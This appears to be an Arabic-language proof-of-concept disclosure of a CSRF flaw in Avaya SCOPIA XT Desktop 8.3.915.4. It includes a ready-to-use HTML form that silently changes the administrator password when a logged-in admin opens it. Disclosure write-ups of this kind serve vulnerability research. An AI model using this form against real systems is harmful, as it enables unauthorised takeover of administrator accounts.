
إثبات مفهوم يعرض ثغرة تزوير الطلبات عبر المواقع (CSRF) في Avaya SCOPIA XT Desktop، مما يتيح تغيير كلمة مرور المسؤول دون وجود رمز مضاد لـ CSRF.
سيصف هذا الـ PoC كيفية استغلال تزوير الطلبات عبر المواقع (CSRF) على SCOPIA XT Desktop الإصدار 8.3.915.4
الموقع الإلكتروني: https://support.avaya.com/products/P1421/scopia-desktop/8.2.1
تزوير الطلبات عبر المواقع، المعروف أيضًا باسم هجوم النقرة الواحدة أو ركوب الجلسة ويُختصر بـ CSRF أو XSRF، هو نوع من الاستغلال الخبيث لموقع ويب حيث يتم إرسال أوامر غير مصرح بها من مستخدم يثق به تطبيق الويب.
في صفحة "Directory and Authentication"، يمكن للمسؤول تغيير كلمة المرور الخاصة به.
عند التقاط الطلب باستخدام Burp Suite، لاحظت أنه لم يتم تطبيق رمز anti-CSRF وأن آلية الأمان الوحيدة هي كوكي الجلسة.
6
أنشأت ملف HTML هذا الذي كان بمثابة إثبات مفهوم (PoC) لاستغلال الثغرة المعروضة.
<!DOCTYPE html>
<html>
<body>
<form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
<input type="text" name="JSESSIONID" value="">
<input type="text" name="newadminusername" value="">
<input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
<input type="text" name="newenablext1000meetingpin" value="false">
<input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
<input type="text" name="checkstatus" value="true">
<input type="submit" value="Send">
</form>
</body>
</html>
عند تشغيله في المتصفح الذي يحتوي على كوكي صالح لبيئة إدارة SCOPIA XT Desktop، كان من الممكن تغيير كلمة مرور المستخدم admin إلى "attacker":
4
5